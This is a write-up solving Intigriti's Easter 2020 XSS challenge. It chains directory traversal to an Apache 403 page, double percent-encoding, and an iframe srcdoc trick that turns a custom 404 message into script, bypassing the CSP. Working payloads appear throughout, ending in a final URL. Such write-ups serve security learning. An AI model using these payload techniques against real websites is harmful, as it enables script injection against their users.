Intigriti Easter XSS Challenge Solution Write-Up: The Forbidden 404 Error
TL;DR Final Payload:
https://challenge.intigriti.io/#.htaccess/%253Ciframe%2520srcdoc%253D%2522%253C
script%2520src%253D%2526quot%253B'%252Balert(document.domain)%252B'%2526quot%25
3B%253E%253C%252Fscript%253E%2522%253E%253C%252Fiframe%253E
Question
CHALLENGE: Find the XSS in our #EasterChallenge and WIN a @Burp_Suite Pro License! We’ll tweet a tip for every 100 likes!#HackWithIntigritihttps://t.co/dYnctSfAAq
— INTIGRITI (@intigriti) April 13, 2020
Source of script.js
:
var hash = document.location.hash.substr(1); if(hash){ displayReason(hash); } document.getElementById("reasons").onchange = function(e){ if(e.target.value != "") displayReason(e.target.value); } function reasonLoaded () { var reason = document.getElementById("reason"); reason.innerHTML = unescape(this.responseText); } function displayReason(reason){ window.location.hash = reason; var xhr = new XMLHttpRequest(); xhr.addEventListener("load", reasonLoaded); xhr.open("GET",`./reasons/${reason}.txt`); xhr.send(); }
Part 1: Getting arbitrary HTML to reflect
From the surface of the index page, we can tell that there’s nothing out of the blue in the source code and all JavaScript is executed from script.js
, so let’s take a look at that. From the simple 20 lines of code, we can identify our XSS vector main flow as follows:
1) Line 1: document.location.hash.substr(1)
containing the part of the URL after the symbol #
, is stored in the variable hash
. (i.e., in https://www.example.com/abc?def=ghi#jkl
, hash
would contain "jkl"
).
2) Line 2-4: If hash
is not an empty string, run the function displayReason()
.
3) Line 13-19: displayReason()
fetches data from the URL https://challenge.intigriti.io/reasons/${reason}.txt
, where reason
is the hash
string. The fetched data is passed to reasonLoaded()
.
4) Line 9-12: reasonLoaded()
decodes the data with unescape()
and echoes out on the page inside the "reason"
div.
In the JavaScript file /script.js
, line 11 reason.innerHTML = unescape(this.responseText);
suggests that arbitrary HTML content can be reflected on the DOM of the page as the raw XHR response is echoed directly on the page with no sanitization, or as a matter of fact, is unsanitized instead. From that, we can conclude that HTML can be reflected via one of two ways:
- The XHR response contains raw HTML text like
<script>alert(1)</script>
. - The XHR response contains HTML text wrapped in percent encoding, such as
%3Cscript%3Ealert(1)%3C%2Fscript%3E
, which is then passed to theunescape()
function, returning the exact same data in mentioned above in 1.
In line 17, xhr.open("GET",`./reasons/${reason}.txt`);
, we know that directory traversal is possible since there is no sanitization against ../
. Unfortunately, we couldn’t fetch XHR data from another host since ./
has prevented that, so we can’t pull the //
trick that’s possible in Intigriti’s October 2019 DOM XSS challenge. We would have to find a spot in the challenge.intigriti.io
web server where one of the two conditions above is possible.
Maybe the 404 page?
It’s not hard to tell that the 404 page is replaced with a custom one, and the way the 404 message is structured is very interestingly peculiar. So specifically structured, I could tell this would help us in a further step, but not now.
Why? Let’s examine it’s behaviour. Can the text <script>
be reflected when passed as a directory, filename, parameter, or value? Accessing https://challenge.intigriti.io/<script>/<script>?<script>[<script>]=<script>
yields this response.
404 - 'File "_3Cscript_3E?_3Cscript_3E_5B_3Cscript_3E_5D=_3Cscript_3E" was not found in this folder.'
Looks like anything after /
is reflected on the error 404 message, but worse still, %
is changed to _
. This endpoint’s response satisfies neither of the above two conditions, I’ve also tried tossing in all kinds of random symbols and Unicode to see how it can be broken, which doesn’t break it, but it gave me a hint for where I should try next.
Apache error pages
While just trying random stuff, a URL I tried, https://challenge.intigriti.io/<script>%2F<script>
, caused it to display the Apache 404 page instead of the custom one. %2f
is the percent encoding of the symbol /
, which is supposed to be the directory separator. I’m not sure of the exact reason it caused this, but I guess Apache just got confused that the directory separator is, well, technically not a directory separator at the same time since it’s percent encoded.
It doesn’t have the URL reflected in the Apache 404 page, but what about 403? To trigger the Apache 403 Forbidden page, we just need to satisfy the directory with /.ht*
pattern, like .htaccess
. It looks like the directory is reflected in this page, but <script>
will be encoded to <script>
.
Condition 1 is out, but what about condition 2? By double encoding <script>
into %253Cscript%253E
, the value reflected on the Forbidden page is %3Cscript%3E
.
Passing that into the original challenge page, it should go through unescape()
and reflect back on the page as <script>
. A single script tag isn’t the best payload to test on DOM XSS, so I’ll be using <h1>big text</h1>
instead.
- Original:
<h1>big text</h1>
- Percent encoded:
%3Ch1%3Ebig%20text%3C%2Fh1%3E
- Double percent encoded:
%253Ch1%253Ebig%2520text%253C%252Fh1%253E
- Final payload:
https://challenge.intigriti.io/#.htaccess/%253Ch1%253Ebig%2520text%253C%252Fh1%253E
And.. voila! We got HTML injected in the div.
Part 2: Bypassing CSP to execute arbitrary JavaScript
A quick payload for XSS that you can think of from the top of your head might be <script>alert(1);</script>
, but unfortunately we’re dealing with DOM XSS, as .innerHTML
is being used here to insert the HTML contents, the script won’t get executed. It’s just a behaviour of JavaScript. You can look at this Stack Overflow question here as reference.
The next easy XSS payload would be <img src=x onerror=alert(1)>
, which would’ve worked, if not for CSP. Using this payload would give you this error message in the console.
Content Security Policy (CSP) is a security feature in modern browsers which can be utilised by web developers to limit from where or which domains could resources (images, videos, scripts, stylesheets) be loaded from. This can be done by sending a Content-Security-Policy
HTTP response header, which in this challenge page is set to default-src 'self'
.
This CSP configuration means that all resources loaded can only be from this domain, the challenge.intigriti.io
domain. You are not allowed to load images from Imgur, or load external JavaScript from your own web server. In fact, 'self'
limits that the only JavaScripts that can be executed are those that is solely from a local JS file from challenge.intigriti.io
, no exceptions, since onerror=alert(1)
would need the 'unsafe-inline'
CSP configuration to work.
This is where the interesting custom 404 message comes into play. Here’s how the message looks like again.
404 - 'File "thisisnotavalidfile.txt" was not found in this folder.'
Believe it or not, this is a line of totally valid JavaScript code that would not throw any exception when executed.
Let’s break it down part by part why this is valid. 404
is an integer, 'File "thisisnotavalidfile.txt" was not found in this folder.'
is a string perfectly wrapped in single quotes. This is an arithmetic function of an integer minus with a string. While mathematically invalid, it’s a running working code that would not throw any errors in the eyes of JavaScript. NaN is short for “Not a Number”, which makes sense, how are you going to minus this string with a number 404?
We can take advantage of this fancily structured error message by breaking out of the string and injecting the alert(document.domain)
. This can be done by attempting to access the non-existant “file” '+alert(document.domain)+'
from the URL, as long as single quotes are not sanitised, which it isn’t as can be seen here.
However, we’re not done yet! We can’t just do <script src="'+alert(document.domain)+'"></script>
due to DOM XSS issue I described earlier, so to get around this, we could use an <iframe>
, but not just any classic <iframe src='data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9jaGFsbGVuZ2UuaW50aWdyaXRpLmlvLycrYWxlcnQoZG9jdW1lbnQuZG9tYWluKSsnIj48L3NjcmlwdD4='></iframe>
(base64 of <script src="http://challenge.intigriti.io/'+alert(document.domain)+'"></script>
), we are still blocked by CSP since this page generated with a data:
wrapper is from a null
origin, and that no longer satisfies the CSP scope of 'self'
.
The last piece of the puzzle lies in this blog post by NCC Group, which relied on a less known iframe attribute srcdoc
. The difference between src
and srcdoc
is that the latter takes in raw HTML values instead of a URL, and this HTML is then rendered as if it’s part of the page, and thus, having the scope and origin of the original page itself. Feel free to read their article to understand more about it.
Our payload now looks like <iframe srcdoc="<script src="'+alert(document.domain)+'"></script>"></iframe>
. Since we need to enclose the srcdoc
value in double quotes, we need to escape the double quotes belonging to the <script>
tag via HTML character entities, whereby "
represents "
.
Part 3: Wrapping it up
We’ve got the XSS settled and CSP bypassed, now let’s join the two payloads together. From the payload in Part 2:
- Original payload:
<iframe srcdoc="<script src="'+alert(document.domain)+'"></script>"></iframe>
- Percent encoded:
%3Ciframe%20srcdoc%3D%22%3Cscript%20src%3D%26quot%3B'%2Balert(document.domain)%2B'%26quot%3B%3E%3C%2Fscript%3E%22%3E%3C%2Fiframe%3E
- Double percent encoded:
%253Ciframe%2520srcdoc%253D%2522%253Cscript%2520src%253D%2526quot%253B'%252Balert(document.domain)%252B'%2526quot%253B%253E%253C%252Fscript%253E%2522%253E%253C%252Fiframe%253E
And now joining it with Part 1’s payload:
- Final payload:
https://challenge.intigriti.io/#.htaccess/%253Ciframe%2520srcdoc%253D%2522%253Cscript%2520src%253D%2526quot%253B'%252Balert(document.domain)%252B'%2526quot%253B%253E%253C%252Fscript%253E%2522%253E%253C%252Fiframe%253E
Would you look at that beauty!
To me, I’d rate this at a moderate difficulty. It’s not very tough, but you need to combine lots of trickery and think out of the box to achieve the final result. This applies to all the past Intigriti’s XSS challenges I’ve seen, so if you’ve failed this time, better luck next time! You’re probably really close, and you’re just missing that lightbulb moment.